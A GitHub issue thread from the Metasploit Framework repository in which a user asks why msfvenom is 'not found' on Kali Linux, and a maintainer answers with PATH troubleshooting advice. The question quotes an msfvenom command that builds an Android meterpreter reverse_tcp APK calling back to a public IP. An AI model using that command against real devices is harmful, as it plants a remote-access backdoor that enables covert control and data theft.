### ISSUE TITLE
command not found

### ISSUE THREAD

**Issue by AtifAhmed29** [rapid7/metasploit-framework#14687]
I'm on a windows 10 pc. I have installed the Kali Linux in a virtual box 

msfvenom -p android/meterpreter/reverse_tcp LHOST= Public ip LPORT=444 R> PayLoadName.apk

in Kali Linux, I get msfvenom command not found how do I fix this

**Comment by gwillcox-r7** [comment]
Its likely that the location of `msfvenom` was not found within your `PATH` environment variable. First locate where the `msfvenom` binary is using a tool like `find`, `locate` or `whereis` and then add it to your `PATH` environment variable using a guide such as https://linuxize.com/post/how-to-add-directory-to-path-in-linux/.
